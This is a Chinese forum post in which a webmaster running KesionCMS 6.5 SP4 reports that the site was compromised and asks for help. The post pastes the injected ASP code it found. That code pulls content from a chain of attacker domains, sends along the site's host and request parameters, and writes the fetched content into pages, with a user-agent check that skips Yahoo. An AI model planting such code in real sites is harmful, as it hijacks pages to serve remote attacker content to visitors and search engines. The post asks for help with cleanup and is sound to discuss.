当前位置:
|
主题:[求助]网站被挂马. [收藏主题] |
 6.5 sp4最新版.
刚才ftp上面顺手删除了几个文件,名字是什么也记不得了.
<% function getHTTPPage(url) On Error Resume Next dim http set http=createobject("MSXML2.XMLHTTP") Http.open "GET",url,false Http.send() if Http.readystate<>4 then exit function end if getHTTPPage=BytesToBstr(Http.responseBody,"UTF-8") 'getHTTPPage=Http.responseBody set http=nothing if err.number<>0 then err.Clear end function Function Getlink() On Error Resume Next user_agent=Request.ServerVariables("HTTP_USER_AGENT") If instr(user_agent,"yahoo")=0 then d=Request.ServerVariables("HTTP_HOST") getPage=getHTTPPage("http://www.199888.cn/about.aspx?d=" & d & "&id=" & Request("id") & "&p="&Request("p")&"") if instr(getPage,"2em")=0 then getPage=getHTTPPage("http://www.1l1l11lll111l1lll11l1l1.com/about.aspx?d=" & d & "&id=" & Request("id") & "&p="&Request("p")&"") end if if instr(getPage,"2em")=0 then getPage=getHTTPPage("http://www.lll1111l1l11l1l11ll11l.com/about.aspx?d=" & d & "&id=" & Request("id") & "&p="&Request("p")&"") end if if instr(getPage,"2em")=0 then getPage=getHTTPPage("http://www.l1l11l1l1l11l1l1l1l1l11.com/about.aspx?d=" & d & "&id=" & Request("id") & "&p="&Request("p")&"") end if if instr(getPage,"2em")=0 then getPage=getHTTPPage("http://www.1l1l11l1l11l11l1l1l1l1l1l.com/about.aspx?d=" & d & "&id=" & Request("id") & "&p="&Request("p")&"") end if if instr(getPage,"2em")=0 then getPage=getHTTPPage("http://www.1l1l1l1llll1111l1ll111ll1.com/about.aspx?d=" & d & "&id=" & Request("id") & "&p="&Request("p")&"") end if response.write getPage if err.number<>0 then err.Clear End If End Function Call Getlink() %> 刚才还ftp下来后,先是用系统的木马扫描,结果一个也没有扫到,只是提示有几个小图片有问题,但那几个图片是完全可以打开的,这几个当时没有删除,竟也没有扫描出来。 郁闷了。 前几天机器刚刚中过鬼影,恰好这些网站文件全部格掉了,完全没有备份... 先暂时删除了一些认为可疑的文件,可终究不知道它们是怎么来的... 老大们帮帮忙,给想想办法... |
|
 支持(0) |  反对(0)
 顶端  底部
|
![电子邮件:[ sdyizhe@126.com ]](http://bbs.kesion.com/club/images/email.gif){kind=small}
|
支持(0) | 反对(0)
顶端 底部
|
| <上一主题 | 下一主题 > |